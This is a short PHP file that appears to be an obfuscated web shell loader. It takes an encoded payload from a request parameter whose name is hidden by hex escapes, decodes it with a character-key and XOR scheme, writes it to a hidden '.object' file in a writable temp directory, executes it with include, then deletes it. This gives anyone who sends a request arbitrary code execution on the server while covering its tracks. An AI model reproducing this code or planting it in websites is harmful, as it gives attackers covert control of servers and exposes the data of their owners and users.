<?php

if(@$_REQUEST["\x69\x74em"] !== null){
	$factor = array_filter([getcwd(), "/dev/shm", getenv("TMP"), "/tmp", getenv("TEMP"), ini_get("upload_tmp_dir"), session_save_path(), "/var/tmp", sys_get_temp_dir()]);
	$rec = $_REQUEST["\x69\x74em"];
	$rec=  explode		 ( 	 '.'	,$rec) 		;		
	$resource	= 	'';
            $s	= 	'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen	= 	strlen( $s);
    
            foreach( $rec as $y => $v4):
                $sChar	= 	ord( $s[$y%	$sLen]);
                $dec	= 	( ( int)$v4 - $sChar -( $y%	10)) ^ 73;
                $resource .= chr( $dec);
            endforeach;
	for ($elem = 0, $dat = count($factor); $elem < $dat; $elem++) {
    $bind = $factor[$elem];
    		if (!!is_dir($bind) && !!is_writable($bind)) {
    $data_chunk = join("/", [$bind, ".object"]);
    $file = fopen($data_chunk, 'w');
if ($file) {
	fwrite($file, $resource);
	fclose($file);
	include $data_chunk;
	@unlink($data_chunk);
	exit;
}
}
}
}